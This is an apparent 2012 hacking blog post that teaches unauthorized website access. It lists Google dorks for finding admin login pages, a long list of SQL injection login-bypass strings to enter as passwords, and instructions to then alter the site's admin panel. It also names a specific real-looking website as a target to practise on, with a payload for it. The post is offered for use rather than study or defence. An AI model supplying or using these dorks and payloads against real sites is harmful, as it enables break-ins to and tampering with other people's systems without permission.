Tuesday, May 29, 2012

Hack Website With "inurl adminlogin.asp" String

First of all goto google.com and search any one of the below dork in google and open that link....
inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:\\admin/admin_login.php

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp


Click On Search Button.

Then click on website URL. when its open there will be space for entering

USER NAME

OR

PASWORD

then in USERNAME box enter or Type Admin

and in PASSWORD Type any one of the below code :

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1


then hit enter key . . .
now web has been hacked . . .

And Start Changing In ADMIN PANEL Ok'z.

Test ur experinse here
http://globaloiljobs.com/Admin​_Login.asp


its Admin Id (Username) Type 1' OR '1'='1

Or

Pasword 1' OR '1'='1

Sql Injection Manual Testing

Search for login or Admin login Pages.

ex: google dork. Go to google Home page

in search bar type.. " inurl:/admin/login.asp" or " inurl: /adminlogin.asp" ...somewhat like that

put the sql magic qoutes in username and password fields.There are many sql quotes like :
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • ='or''=